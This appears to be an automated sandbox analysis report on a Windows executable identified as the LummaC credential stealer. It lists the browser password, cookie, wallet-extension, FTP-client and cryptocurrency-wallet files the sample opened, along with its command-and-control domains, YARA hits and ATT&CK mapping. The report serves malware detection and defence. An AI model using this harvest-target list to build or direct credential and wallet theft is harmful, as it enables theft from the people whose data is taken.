Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\ronwod.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\ronwod.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1778237713.0000000001046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1777955203.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1724682742.0000000001024000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1750093043.0000000001024000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1750624772.0000000001024000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1701708029.0000000001024000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1775565703.0000000001024000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1728584108.0000000001024000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ronwod.exe PID: 7544, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: ronwod.exe PID: 7544, type: MEMORYSTR
Source: Yara match	File source: 0.2.ronwod.exe.e90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ronwod.exe.e90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ronwod.exe.6cd40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1974188123.000000006CD4A000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Deobfuscate/Decode Files or Information	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ronwod.exe	43%	ReversingLabs	Win32.Trojan.Generic
ronwod.exe	46%	Virustotal		Browse

Source	Detection	Scanner	Label
https://lackadausaz.click/apiUo)	0%	Avira URL Cloud	safe
https://lackadausaz.click/	0%	Avira URL Cloud	safe
https://lackadausaz.click/api3Bl1	0%	Avira URL Cloud	safe
https://lackadausaz.click/g	0%	Avira URL Cloud	safe
https://lackadausaz.click/api	0%	Avira URL Cloud	safe
https://lackadausaz.click/c	0%	Avira URL Cloud	safe
https://lackadausaz.click/R	0%	Avira URL Cloud	safe
https://lackadausaz.click/api#	0%	Avira URL Cloud	safe
https://lackadausaz.click/apinpLY	0%	Avira URL Cloud	safe
https://lackadausaz.click/e	0%	Avira URL Cloud	safe
https://lackadausaz.click/apiLo	0%	Avira URL Cloud	safe
https://lackadausaz.click/D	0%	Avira URL Cloud	safe
https://lackadausaz.click/F	0%	Avira URL Cloud	safe
https://lackadausaz.click//	0%	Avira URL Cloud	safe
https://lackadausaz.click/api7jy	0%	Avira URL Cloud	safe
https://lackadausaz.click/apieH;	0%	Avira URL Cloud	safe
https://lackadausaz.click/apicQqi	0%	Avira URL Cloud	safe
https://lackadausaz.click/apite/I3	0%	Avira URL Cloud	safe
https://lackadausaz.click:443/api	0%	Avira URL Cloud	safe
https://lackadausaz.click/apib	0%	Avira URL Cloud	safe
https://lackadausaz.click/s	0%	Avira URL Cloud	safe
https://lackadausaz.click/apino.	0%	Avira URL Cloud	safe
lackadausaz.click	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lackadausaz.click	104.21.92.219	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://lackadausaz.click/api	true	Avira URL Cloud: safe	unknown
scentniej.buzz	false		high
hummskitnj.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
prisonyfork.buzz	false		high
lackadausaz.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/c	ronwod.exe, 00000000.00000003.1673073544.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/g	ronwod.exe, 00000000.00000003.1803349034.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/e	ronwod.exe, 00000000.00000003.1728584108.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750093043.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701708029.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724682742.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1750624772.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/api#	ronwod.exe, 00000000.00000003.1816042398.0000000003F82000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/R	ronwod.exe, 00000000.00000003.1701708029.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	ronwod.exe, 00000000.00000003.1701673512.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728215344.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724648396.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701544346.0000000003FC7000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701416116.0000000004013000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/api3Bl1	ronwod.exe, 00000000.00000003.1701781398.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1728154349.0000000003F76000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/apiUo)	ronwod.exe, 00000000.00000003.1798495056.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/	ronwod.exe, 00000000.00000002.1973576240.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click/apinpLY	ronwod.exe, 00000000.00000003.1750046187.0000000003F78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	ronwod.exe, 00000000.00000003.1751979365.0000000003F80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/F	ronwod.exe, 00000000.00000003.1728584108.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1701708029.000000000105C000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1724682742.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	ronwod.exe, 00000000.00000003.1750510292.0000000003FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/D	ronwod.exe, 00000000.00000002.1973493421.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1896473117.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	ronwod.exe, 00000000.00000003.1701544346.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	ronwod.exe, 00000000.00000003.1698380831.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1697961335.0000000003FBB000.00000004.00000800.00020000.00000000.sdmp, ronwod.exe, 00000000.00000003.1698795828.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/apiLo	ronwod.exe, 00000000.00000003.1750093043.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lackadausaz.click//	ronwod.exe, 00000000.00000003.1775565703.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	ronwod.exe, 00000000.00000003.1751724024.0000000004098000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lackadausaz.click/api7jy	ronwod.exe, 00000000.00000003.1750046187.0000000003F78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
